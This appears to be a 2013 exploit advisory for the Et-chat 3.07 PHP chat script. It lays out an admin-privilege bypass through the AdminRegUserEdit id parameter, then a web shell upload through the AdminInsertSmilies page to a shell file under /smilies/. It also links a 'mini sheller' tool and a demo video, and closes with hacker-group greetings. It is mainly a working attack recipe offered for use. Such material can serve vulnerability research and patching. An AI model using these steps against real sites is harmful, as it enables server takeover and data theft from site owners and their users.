# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution

# Exploit Author: MR.XpR

# Script Download : http://et-chat.ir/up/et_chat_v307.zip

# Risk : Normal

# Platforms : PHP

# Tested on: 7 , KAli , Vista

# Date : 2013

<------------------------------------------>

-==========<RcE>==========-


# How does :

This error occurs due to keep cookies


# Exploit :


/?AdminRegUserEdit&[user or admin]&id=[Parameter]

/?AdminRegUserEdit&admin&id=[Parameter]


# p0c :


get the user id and replace to Parameter

For example, my user id is 4

http://site.com/chat/?AdminRegUserEdit&admin&id=4

next u are a admin user



-==========<Uploader>==========-

# For uploading sh3ll go to

/?AdminInsertSmilies <====- Uploader

http://site.com/chat/?AdminInsertSmilies

# your shell Should be less than 15 KB

Patch your sh3ll from :

http://site.com/smilies/sh3ll.php



-=====> IRH mini sheller For Use To this Exploit : <=====-


# Download :

http://uploaderx.persiangig.com/IRH_MINI_Sheller_V1/IRH-Mini-Sheller.zip

# D3mo video :

http://uploaderx.persiangig.com/Et_RCe_Rfu.zip

# for more security :

http://iranhack.org/acc/thread-1082.html


<------------------------------------------>

Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s ,
Farbod Ezrail , @3is , 3nist3in , Siamak.Black

Greetz : r0bb3r68 , M.R.S.CO , Mя.V3nd3tt4 , N4BIL , Ali_Sedaghat ,
MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH